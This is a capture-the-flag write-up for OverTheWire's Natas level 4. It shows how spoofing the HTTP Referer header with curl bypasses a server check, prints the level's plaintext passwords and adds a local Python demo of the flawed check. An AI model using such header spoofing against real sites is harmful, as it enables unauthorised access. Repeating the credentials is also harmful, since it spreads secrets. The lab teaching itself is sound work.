With the credentials discovered in the previous challenge, head over to http://natas4.natas.labs.overthewire.org and take a look at the page. This time around, you can look at the source all you want, but there's nothing interesting there.
Let's look at the information they give us when we first open the page:

```
Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
```
Now let's do the only thing we can actually do on this page, press the "Refresh page" link:

```
Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
```
I hope the difference is easy enough to spot. When we enter the page the first time, the server doesn't know from which link we got there; when we use the "Refresh page" link, it knows where we came from, which is the page's own URL.
In order to understand this, one must have some notion of how HTTP works, specifically HTTP headers. There's a request header called Referer (it should be Referrer, but people can't type!) that has the following definition (quoted from Wikipedia): "This is the address of the previous web page from which a link to the currently requested page was followed." Simply put, when we click a link, the destination page gets a Referer header carrying the URL of the page we came from. Easy, right?
Now that we know how this works, how can we exploit it? If you remember level01, we used curl to fetch the page. In this challenge we're going to do the same thing, but with an extra parameter so we can set the header the way we like it. Here's what it looks like:
```bash
curl --referer "http://natas5.natas.labs.overthewire.org/" http://natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ@natas4.natas.labs.overthewire.org/
```
We execute the command and get this output:

```html
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas4", "pass": "Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" };</script></head>
<body>
<h1>natas4</h1>
<div id="content">

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>
</html>
```
And just like that, in line 15 of the output (the "Access granted" line) we have the password for natas5.
| User | Password |
| --- | --- |
| natas5 | iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq |
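To make the point behind this level concrete, here is an added example (not part of the original post, and not the challenge's own PHP source) that models the natas4 check as a throwaway local HTTP server and replays the three requests from above: the first visit with no Referer, the "Refresh page" click, and the curl-style request that sets the header itself. The password string is a constructed placeholder. Because the client picks the Referer value, a check like this is a usability hint at best, never an authentication control.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the natas4 logic; the real PHP source is not on the page.
ALLOWED_REFERER = "http://natas5.natas.labs.overthewire.org/"
SECRET = "<password placeholder>"

def referer_check(referer: str) -> str:
    """The server-side decision as the page describes it: equality on a client-set header."""
    if referer == ALLOWED_REFERER:
        return f"Access granted. The password for natas5 is {SECRET}"
    return (f'Access disallowed. You are visiting from "{referer}" '
            f'while authorized users should come only from "{ALLOWED_REFERER}"')

class RefererGate(BaseHTTPRequestHandler):
    def do_GET(self):
        # A missing header becomes "", matching the empty quotes on the first visit.
        body = referer_check(self.headers.get("Referer", "")).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

def fetch(url, referer=None):
    """Client side: like `curl --referer`, the caller chooses the header value."""
    req = urllib.request.Request(url)
    if referer is not None:
        req.add_header("Referer", referer)
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.read().decode()

def run_demo() -> dict:
    srv = HTTPServer(("127.0.0.1", 0), RefererGate)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{srv.server_address[1]}/"
    try:
        return {
            "first_visit": fetch(url),                       # no Referer at all
            "refresh": fetch(url, referer=url),              # a real link from the page itself
            "spoofed": fetch(url, referer=ALLOWED_REFERER),  # what curl --referer sends
        }
    finally:
        srv.shutdown()
        srv.server_close()
```

Run `run_demo()` and compare the three bodies: only the request whose Referer the client set to the expected URL is granted, exactly as with curl above.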
One more challenge down, this one required some protocol knowledge in order to exploit, but I'm sure it's still pretty accessible to most. Things are starting to get interesting!
Never Settle,